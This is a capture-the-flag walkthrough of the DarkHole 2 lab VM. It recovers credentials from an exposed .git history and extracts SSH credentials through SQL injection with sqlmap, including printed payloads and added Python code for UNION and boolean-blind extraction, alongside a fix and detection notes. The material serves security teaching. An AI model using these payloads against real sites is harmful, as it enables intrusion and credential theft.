DARKHOLE: 2

Download: https://download.vulnhub.com/darkhole/darkhole_2.zip

Description

Difficulty: Hard
This works better with VMware rather than VirtualBox
Hint: Don't waste your time For Brute-Force

1: Information gathering

Host discovery with netdiscover

$ sudo netdiscover -i ens33 -r 192.168.1.171/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     50:d2:f5:7c:60:ea      2     120  Beijing Xiaomi Mobile Software Co., Ltd
 192.168.1.169   08:00:27:f7:a2:b4      1      60  PCS Systemtechnik GmbH
 192.168.1.238   52:96:66:d8:a6:d9      1      60  Unknown vendor

Port scanning

Full port scan

$ sudo nmap -p- -min-rate 10000 192.168.1.169
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-28 05:25 EDT
Nmap scan report for 192.168.1.169
Host is up (0.00029s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:F7:A2:B4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds

Default script and service version scan

$ nmap -p22,80 -sC -sV 192.168.1.169
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-28 05:26 EDT
Nmap scan report for 192.168.1.169
Host is up (0.00057s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-git: 
|   192.168.1.169:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: i changed login.php file for more secure 
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole V2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.41 seconds

--script=vuln scan

$ nmap -p22,80 --script=vuln 192.168.1.169
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-28 05:27 EDT
Nmap scan report for 192.168.1.169
Host is up (0.00094s latency).

PORT   STATE SERVICE
22/tcp open  ssh
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|       httponly flag not set
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /login.php: Possible admin folder
|   /.git/HEAD: Git folder
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_  /style/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
| http-git: 
|   192.168.1.169:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: i changed login.php file for more secure 
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 31.55 seconds

Directory brute-forcing

$ gobuster dir -u "http://192.168.1.169" -w /wordlist/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.169
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /wordlist/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
2023/05/28 05:30:48 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.php            (Status: 200) [Size: 740]
/login.php            (Status: 200) [Size: 1026]
/style                (Status: 301) [Size: 314] [--> http://192.168.1.169/style/]
/js                   (Status: 301) [Size: 311] [--> http://192.168.1.169/js/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/config               (Status: 301) [Size: 315] [--> http://192.168.1.169/config/]
/dashboard.php        (Status: 200) [Size: 11]
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 880845 / 882244 (99.84%)
===============================================================
2023/05/28 05:31:19 Finished
===============================================================

2: Getting a shell

The nmap scan flagged an exposed .git directory, so dump the repository with git-dumper:

$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  tools  Videos
$ mkdir 169
$ git-dumper http://192.168.1.169/.git 169/
[-] Testing http://192.168.1.169/.git/HEAD [200]
[-] Testing http://192.168.1.169/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://192.168.1.169/.gitignore [404]
[-] Fetching http://192.168.1.169/.git/ [200]
[-] http://192.168.1.169/.gitignore responded with status code 404
[-] Fetching http://192.168.1.169/.git/config [200]
[-] Fetching http://192.168.1.169/.git/HEAD [200]
[-] Fetching http://192.168.1.169/.git/info/ [200]
[-] Fetching http://192.168.1.169/.git/hooks/ [200]
[-] Fetching http://192.168.1.169/.git/COMMIT_EDITMSG [200]
[-] Fetching http://192.168.1.169/.git/index [200]
[-] Fetching http://192.168.1.169/.git/info/exclude [200]
[-] Fetching http://192.168.1.169/.git/description [200]
[-] Fetching http://192.168.1.169/.git/logs/ [200]
[-] Fetching http://192.168.1.169/.git/refs/ [200]
[-] Fetching http://192.168.1.169/.git/hooks/commit-msg.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://192.168.1.169/.git/objects/ [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-commit.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/post-update.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-push.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-receive.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://192.168.1.169/.git/hooks/update.sample [200]
[-] Fetching http://192.168.1.169/.git/refs/heads/ [200]
[-] Fetching http://192.168.1.169/.git/objects/0f/ [200]
[-] Fetching http://192.168.1.169/.git/refs/tags/ [200]
[-] Fetching http://192.168.1.169/.git/objects/04/ [200]
[-] Fetching http://192.168.1.169/.git/objects/6e/ [200]
[-] Fetching http://192.168.1.169/.git/objects/09/ [200]
[-] Fetching http://192.168.1.169/.git/objects/8a/ [200]
[-] Fetching http://192.168.1.169/.git/objects/9d/ [200]
[-] Fetching http://192.168.1.169/.git/logs/HEAD [200]
[-] Fetching http://192.168.1.169/.git/objects/49/ [200]
[-] Fetching http://192.168.1.169/.git/objects/4e/ [200]
[-] Fetching http://192.168.1.169/.git/objects/7f/ [200]
[-] Fetching http://192.168.1.169/.git/objects/56/ [200]
[-] Fetching http://192.168.1.169/.git/logs/refs/ [200]
[-] Fetching http://192.168.1.169/.git/objects/66/ [200]
[-] Fetching http://192.168.1.169/.git/objects/93/ [200]
[-] Fetching http://192.168.1.169/.git/objects/59/ [200]
[-] Fetching http://192.168.1.169/.git/objects/77/ [200]
[-] Fetching http://192.168.1.169/.git/objects/8b/ [200]
[-] Fetching http://192.168.1.169/.git/objects/aa/ [200]
[-] Fetching http://192.168.1.169/.git/objects/a2/ [200]
[-] Fetching http://192.168.1.169/.git/objects/b2/ [200]
[-] Fetching http://192.168.1.169/.git/objects/a4/ [200]
[-] Fetching http://192.168.1.169/.git/objects/c1/ [200]
[-] Fetching http://192.168.1.169/.git/objects/b6/ [200]
[-] Fetching http://192.168.1.169/.git/objects/32/ [200]
[-] Fetching http://192.168.1.169/.git/objects/e6/ [200]
[-] Fetching http://192.168.1.169/.git/objects/ca/ [200]
[-] Fetching http://192.168.1.169/.git/objects/pack/ [200]
[-] Fetching http://192.168.1.169/.git/objects/c9/ [200]
[-] Fetching http://192.168.1.169/.git/refs/heads/master [200]
[-] Fetching http://192.168.1.169/.git/objects/0f/1d821f48a9cf662f285457a5ce9af6b9feb2c4 [200]
[-] Fetching http://192.168.1.169/.git/objects/info/ [200]
[-] Fetching http://192.168.1.169/.git/objects/8a/0ff67b07eb0cc9b7bed4f9094862c22cab2a7d [200]
[-] Fetching http://192.168.1.169/.git/objects/04/4d8b4fec000778de9fb27726de4f0f56edbd0e [200]
[-] Fetching http://192.168.1.169/.git/objects/7f/d95a2f170cb55fbb335a56974689f659e2c383 [200]
[-] Fetching http://192.168.1.169/.git/objects/09/04b1923584a0fb0ab31632de47c520db6a6e21 [200]
[-] Fetching http://192.168.1.169/.git/objects/49/151b46cc957717f5529d362115339d4abfe207 [200]
[-] Fetching http://192.168.1.169/.git/objects/9d/ed9bf70f1f63a852e9e4f02df7b6d325e95c67 [200]
[-] Fetching http://192.168.1.169/.git/objects/4e/b24de5b85be7cf4b2cef3f0cfc83b09a236133 [200]
[-] Fetching http://192.168.1.169/.git/objects/6e/4328f5f878ed20c0b68fc8bda2133deadc49a3 [200]
[-] Fetching http://192.168.1.169/.git/logs/refs/heads/ [200]
[-] Fetching http://192.168.1.169/.git/objects/66/5001d05a7c0b6428ce22de1ae572c54cba521d [200]
[-] Fetching http://192.168.1.169/.git/objects/aa/2a5f3aa15bb402f2b90a07d86af57436d64917 [200]
[-] Fetching http://192.168.1.169/.git/objects/93/9b9aad671e5bcde51b4b5d99b1464e2d52ceaa [200]
[-] Fetching http://192.168.1.169/.git/objects/56/987e1f75e392aae416571b38b53922c49f6e7e [200]
[-] Fetching http://192.168.1.169/.git/objects/59/218997bfb0d8012a918e43bea3e497e68248a9 [200]
[-] Fetching http://192.168.1.169/.git/objects/a4/d900a8d85e8938d3601f3cef113ee293028e10 [200]
[-] Fetching http://192.168.1.169/.git/objects/8b/6cd9032d268332de09c64cbe9efa63ace3998e [200]
[-] Fetching http://192.168.1.169/.git/objects/c1/ef127486aa47cd0b3435bca246594a43b559bb [200]
[-] Fetching http://192.168.1.169/.git/objects/77/c09cf4b905b2c537f0a02bca81c6fbf32b9c9d [200]
[-] Fetching http://192.168.1.169/.git/objects/b6/f546da0ab9a91467412383909c8edc9859a363 [200]
[-] Fetching http://192.168.1.169/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391 [200]
[-] Fetching http://192.168.1.169/.git/objects/32/d0928f948af8252b0200ff9cac40534bfe230b [200]
[-] Fetching http://192.168.1.169/.git/objects/c9/56989b29ad0767edc6cf3a202545927c3d1e76 [200]
[-] Fetching http://192.168.1.169/.git/objects/b2/076545503531a2e482a89b84f387e5d44d35c0 [200]
[-] Fetching http://192.168.1.169/.git/objects/ca/f37015411ad104985c7dd86373b3a347f71097 [200]
[-] Fetching http://192.168.1.169/.git/logs/refs/heads/master [200]
[-] Fetching http://192.168.1.169/.git/objects/a2/0488521df2b427246c0155570f5bfad6936c6c [200]
[-] Fetching http://192.168.1.169/.git/objects/32/580f7fb8c39cdad6a7f49839cebfe07f597bcf [200]
[-] Fetching http://192.168.1.169/.git/hooks/pre-applypatch.sample [200]
[-] Running git checkout .
Updated 14 paths from the index

The commit messages below give it away: the second commit "added login.php file with default credentials" and the latest one "changed login.php file for more secure". Checking out the earlier commit recovers the hard-coded login, Username: lush@admin.com Password: 321.

$ git log
commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4 (HEAD -> master)
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:14:32 2021 +0300

    i changed login.php file for more secure

commit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:06:20 2021 +0300

    I added login.php file with default credentials

commit aa2a5f3aa15bb402f2b90a07d86af57436d64917
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:02:44 2021 +0300

    First Initialize
$ git checkout a4d900a8d85e8938d3601f3cef113ee293028e10
Note: switching to 'a4d900a8d85e8938d3601f3cef113ee293028e10'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

  git switch -c <new-branch-name>

Or undo this operation with:

  git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at a4d900a I added login.php file with default credentials
$ cat login.php 
<?php
session_start();
require 'config/config.php';
if($_SERVER['REQUEST_METHOD'] == 'POST'){
    if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
        $_SESSION['userid'] = 1;
        header("location:dashboard.php");
        die();
    }

}
?>

<link rel="stylesheet" href="style/login.css">
<head>
    <script src="https://kit.fontawesome.com/fe909495a1.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="Project_1.css">
    <title>Home</title>
</head>

<body>

<div class="container">
    <h1>👋 Welcome</h1>
    <!-- <a href="file:///C:/Users/SAURABH%20SINGH/Desktop/HTML5/PROJECTS/Project%201/Project_1.html"><h1>Sign In</h1></a> -->
    <!-- <a href="file:///C:/Users/SAURABH%20SINGH/Desktop/HTML5/PROJECTS/Project%201/P2.html">  <h1>Log In</h1></a> -->
    <form action="" method="post">
    <div class="box">
        <i  class="fas fa-envelope"></i>
        <input type="email" name="email" id="email"  placeholder="Enter Your Email" required>
    </div>
    <div class="box">
        <i  class="fas fa-key"></i>
        <input type="password" name="password" id="password" placeholder="Enter Your Password" required>
    </div>
        <button id="btn" name="button">Login</button>
    </form>


</div>

</body>
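That commit walk is the whole point of an exposed .git: the "more secure" commit replaces login.php, but the blob with the old credentials stays in the object store and any client that can fetch .git/ can read it. The following is an added example, not part of this writeup or of the DarkHole VM: it reads a .git directory's loose objects directly (HEAD, refs, commit, tree and blob objects, the same files git-dumper fetched above) and greps every revision of every file for password literals. To run offline it builds a constructed two-commit repository in a temp directory whose shape mirrors the history above; the regular expression and the sample file contents are assumptions for illustration.

```python
import hashlib
import os
import re
import tempfile
import zlib

# Catches password literals such as  $_POST['password'] == "321"  or  pass = 'x'
# and captures the value; tuned for the sample below, not an exhaustive scanner.
CRED_RE = re.compile(r"""(?i)pass(?:word|wd)?\W{0,6}(?:==|=|:)\s*['"]?([A-Za-z0-9@._!-]{3,})""")


def _write_object(git_dir, kind, body):
    """Store a loose object the way git does: zlib('<kind> <len>\\0' + body)."""
    raw = f"{kind} {len(body)}".encode() + b"\0" + body
    sha = hashlib.sha1(raw).hexdigest()
    os.makedirs(os.path.join(git_dir, "objects", sha[:2]), exist_ok=True)
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def _read_object(git_dir, sha):
    """Return (kind, body) of a loose object; packfiles are not handled here."""
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "rb") as f:
        header, _, body = zlib.decompress(f.read()).partition(b"\0")
    return header.split(b" ")[0].decode(), body


def _walk_tree(git_dir, tree_sha, prefix=""):
    """Yield (path, blob_sha) for every file under a tree. Entries are
    '<mode> <name>\\0' followed by the 20 raw SHA-1 bytes."""
    _, body = _read_object(git_dir, tree_sha)
    i = 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        sha = body[nul + 1:nul + 21].hex()
        i = nul + 21
        if mode.startswith("40"):              # 40000 = subdirectory
            yield from _walk_tree(git_dir, sha, prefix + name + "/")
        else:
            yield prefix + name, sha


def head_sha(git_dir):
    with open(os.path.join(git_dir, "HEAD")) as f:
        ref = f.read().strip()
    if not ref.startswith("ref: "):
        return ref                             # detached HEAD holds the sha itself
    with open(os.path.join(git_dir, ref[5:])) as f:
        return f.read().strip()


def scan_history(git_dir):
    """Walk every commit reachable from HEAD and return
    [(commit_sha, message, path, secret)] for each credential literal in any
    revision of any file, including ones a later commit removed."""
    hits, seen, queue = [], set(), [head_sha(git_dir)]
    while queue:
        sha = queue.pop()
        if sha in seen:
            continue
        seen.add(sha)
        kind, body = _read_object(git_dir, sha)
        if kind != "commit":
            continue
        headers, _, message = body.partition(b"\n\n")
        tree, parents = None, []
        for line in headers.split(b"\n"):
            key, _, value = line.partition(b" ")
            if key == b"tree":
                tree = value.decode()
            elif key == b"parent":
                parents.append(value.decode())
        for path, blob_sha in _walk_tree(git_dir, tree):
            _, blob = _read_object(git_dir, blob_sha)
            for m in CRED_RE.finditer(blob.decode("utf-8", "replace")):
                hits.append((sha, message.decode().strip(), path, m.group(1)))
        queue.extend(parents)
    return hits


def build_sample_repo():
    """Constructed two-commit repository shaped like the DarkHole history:
    commit 1 adds login.php with a hard-coded password, commit 2 'fixes' it."""
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    os.makedirs(os.path.join(git_dir, "refs", "heads"))

    def commit(blob_sha, parent, msg):
        tree = _write_object(git_dir, "tree", b"100644 login.php\0" + bytes.fromhex(blob_sha))
        lines = [f"tree {tree}"] + ([f"parent {parent}"] if parent else [])
        lines += ["author Dev <dev@example> 0 +0000", "committer Dev <dev@example> 0 +0000", "", msg]
        return _write_object(git_dir, "commit", "\n".join(lines).encode() + b"\n")

    v1 = _write_object(git_dir, "blob", b"<?php if($_POST['email'] == \"lush@admin.com\" && $_POST['password'] == \"321\") {}")
    c1 = commit(v1, None, "I added login.php file with default credentials")
    v2 = _write_object(git_dir, "blob", b"<?php $st = $db->prepare('SELECT id FROM users WHERE email=? AND password=?');")
    c2 = commit(v2, c1, "i changed login.php file for more secure")
    with open(os.path.join(git_dir, "refs", "heads", "master"), "w") as f:
        f.write(c2 + "\n")
    with open(os.path.join(git_dir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    return git_dir
```

Point scan_history() at the .git directory git-dumper produced to check a real dump; the walker reads loose objects only, so if the dump contains objects/pack/*.pack use git log -p --all instead (or git unpack-objects first). A hit in a commit other than HEAD is exactly the DarkHole situation: the secret is gone from the working tree but not from history, which only a history rewrite plus credential rotation fixes, and which a web server should never expose in the first place (deny access to .git/ or keep the checkout outside the document root).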

After logging in with those, dashboard.php?id=1 is the only input left to test. Run sqlmap against it, passing the logged-in session's PHPSESSID with --cookie, and enumerate databases first:

$ sqlmap -u "http://192.168.1.169/dashboard.php?id=1" --cookie="PHPSESSID=0152jic2ivpmp8inrc0530jod2" --dbs --batch
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.5.4#dev}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:36:26 /2023-05-28/

[06:36:26] [INFO] testing connection to the target URL
[06:36:27] [INFO] checking if the target is protected by some kind of WAF/IPS
[06:36:27] [INFO] testing if the target URL content is stable
[06:36:27] [INFO] target URL content is stable
[06:36:27] [INFO] testing if GET parameter 'id' is dynamic
[06:36:27] [WARNING] GET parameter 'id' does not appear to be dynamic
[06:36:27] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[06:36:27] [INFO] testing for SQL injection on GET parameter 'id'
[06:36:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[06:36:27] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[06:36:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[06:36:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[06:36:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[06:36:27] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[06:36:27] [INFO] testing 'Generic inline queries'
[06:36:27] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[06:36:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[06:36:27] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[06:36:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[06:36:37] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[06:36:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[06:36:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[06:36:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[06:36:37] [INFO] target URL appears to have 6 columns in query
[06:36:37] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))fTwN) AND 'LqHe'='LqHe

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-7994' UNION ALL SELECT NULL,CONCAT(0x71766b6b71,0x546e58506d4975694b594d624347726276485079546569505a477a55526759646b634d4f4a714b6a,0x716b6b7671),NULL,NULL,NULL,NULL-- -
---
[06:36:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[06:36:37] [INFO] fetching database names
available databases [5]:
[*] darkhole_2
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

[06:36:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 27 times
[06:36:37] [INFO] fetched data logged to text files under '/home/team003/.local/share/sqlmap/output/192.168.1.169'

[*] ending @ 06:36:37 /2023-05-28/

$ sqlmap -u "http://192.168.1.169/dashboard.php?id=1" --cookie="PHPSESSID=0152jic2ivpmp8inrc0530jod2" -D "darkhole_2" --tables --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.7.5.4#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:37:35 /2023-05-28/

[06:37:35] [INFO] resuming back-end DBMS 'mysql' 
[06:37:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))fTwN) AND 'LqHe'='LqHe

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-7994' UNION ALL SELECT NULL,CONCAT(0x71766b6b71,0x546e58506d4975694b594d624347726276485079546569505a477a55526759646b634d4f4a714b6a,0x716b6b7671),NULL,NULL,NULL,NULL-- -
---
[06:37:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[06:37:35] [INFO] fetching tables for database: 'darkhole_2'
Database: darkhole_2
[2 tables]
+-------+
| ssh   |
| users |
+-------+

[06:37:35] [INFO] fetched data logged to text files under '/home/team003/.local/share/sqlmap/output/192.168.1.169'

[*] ending @ 06:37:35 /2023-05-28/
$ sqlmap -u "http://192.168.1.169/dashboard.php?id=1" --cookie="PHPSESSID=0152jic2ivpmp8inrc0530jod2" -D "darkhole_2" -T "ssh" --dump --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.5.4#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:38:40 /2023-05-28/

[06:38:40] [INFO] resuming back-end DBMS 'mysql' 
[06:38:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9308 FROM (SELECT(SLEEP(5)))fTwN) AND 'LqHe'='LqHe

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-7994' UNION ALL SELECT NULL,CONCAT(0x71766b6b71,0x546e58506d4975694b594d624347726276485079546569505a477a55526759646b634d4f4a714b6a,0x716b6b7671),NULL,NULL,NULL,NULL-- -
---
[06:38:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[06:38:40] [INFO] fetching columns for table 'ssh' in database 'darkhole_2'
[06:38:40] [INFO] fetching entries for table 'ssh' in database 'darkhole_2'
Database: darkhole_2
Table: ssh
[1 entry]
+----+------+--------+
| id | pass | user   |
+----+------+--------+
| 1  | fool | jehad  |
+----+------+--------+

[06:38:40] [INFO] table 'darkhole_2.ssh' dumped to CSV file '/home/team003/.local/share/sqlmap/output/192.168.1.169/dump/darkhole_2/ssh.csv'
[06:38:40] [INFO] fetched data logged to text files under '/home/team003/.local/share/sqlmap/output/192.168.1.169'

[*] ending @ 06:38:40 /2023-05-28/
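sqlmap automated three things above: proving the id parameter lands inside a single-quoted string, counting the query's columns with ORDER BY, and pulling the ssh table through a UNION. The example below is an added one, not from the writeup and not the VM's dashboard.php (whose source the page does not show): it reproduces those steps against an in-memory SQLite stand-in, with a constructed six-column users table to match the column count sqlmap reported and the ssh table it dumped. MySQL's CONCAT() becomes SQLite's ||, and the time-based test is omitted because SQLite has no SLEEP(); a boolean-blind extractor stands in for it to show the fallback when UNION output is not reflected in the page.

```python
import sqlite3

# sqlmap's UNION payload from the run above, adapted to SQLite: the negative id
# empties the real result set, the UNION supplies the six columns sqlmap
# counted, and column 2 carries user:pass out of the ssh table.
UNION_PAYLOAD = "-7994' UNION ALL SELECT NULL,user||':'||pass,NULL,NULL,NULL,NULL FROM ssh-- -"


def make_db():
    """Constructed stand-in for darkhole_2: a six-column users table (to match
    sqlmap's column count) plus the ssh table sqlmap dumped. Column names of
    users are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, email TEXT, password TEXT, address TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'lush', 'lush@admin.com', '321', 'n/a', 'admin');
        CREATE TABLE ssh (id INTEGER, pass TEXT, user TEXT);
        INSERT INTO ssh VALUES (1, 'fool', 'jehad');
    """)
    return db


def dashboard_vulnerable(db, id_param):
    """The pattern sqlmap's  id=1' ...  payloads imply: the parameter is spliced
    into a single-quoted literal with no escaping."""
    return db.execute(f"SELECT * FROM users WHERE id='{id_param}'").fetchall()


def dashboard_fixed(db, id_param):
    """Same query, parameterised: the payload is compared as a value and matches nothing."""
    return db.execute("SELECT * FROM users WHERE id=?", (id_param,)).fetchall()


def find_column_count(db, max_cols=20):
    """ORDER BY n probing (sqlmap's 'ORDER BY technique'): the first n that
    errors is one past the width, so a UNION needs n-1 columns."""
    for n in range(1, max_cols + 1):
        try:
            dashboard_vulnerable(db, f"1' ORDER BY {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
    return None


def dump_ssh_union(db):
    """One request: every ssh row comes back in column 2 of the result."""
    return [row[1] for row in dashboard_vulnerable(db, UNION_PAYLOAD)]


def boolean_blind_char(db, subquery, position, alphabet="abcdefghijklmnopqrstuvwxyz0123456789:"):
    """Extract one character by asking 'is character N equal to X?' and watching
    whether the legitimate row still comes back: one request per guess."""
    for ch in alphabet:
        if dashboard_vulnerable(db, f"1' AND substr(({subquery}),{position},1)='{ch}'-- -"):
            return ch
    return None


def dump_ssh_blind(db, max_len=32):
    """Character-by-character fallback for when UNION output is not shown."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = boolean_blind_char(db, "SELECT user||':'||pass FROM ssh LIMIT 1", pos)
        if ch is None:          # substr() past the end returns '' -> no match
            break
        out += ch
    return out
```

dashboard_fixed() is the one-line repair: with a bound parameter the same payload is compared as a value and returns nothing. The HTTP 500s sqlmap reported during its run are what syntax-breaking probes look like from the server side; the same errors land in Apache's error log, which is the detection angle for this class of attack.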
$ ssh jehad@192.168.1.169
jehad@192.168.1.169's password: 
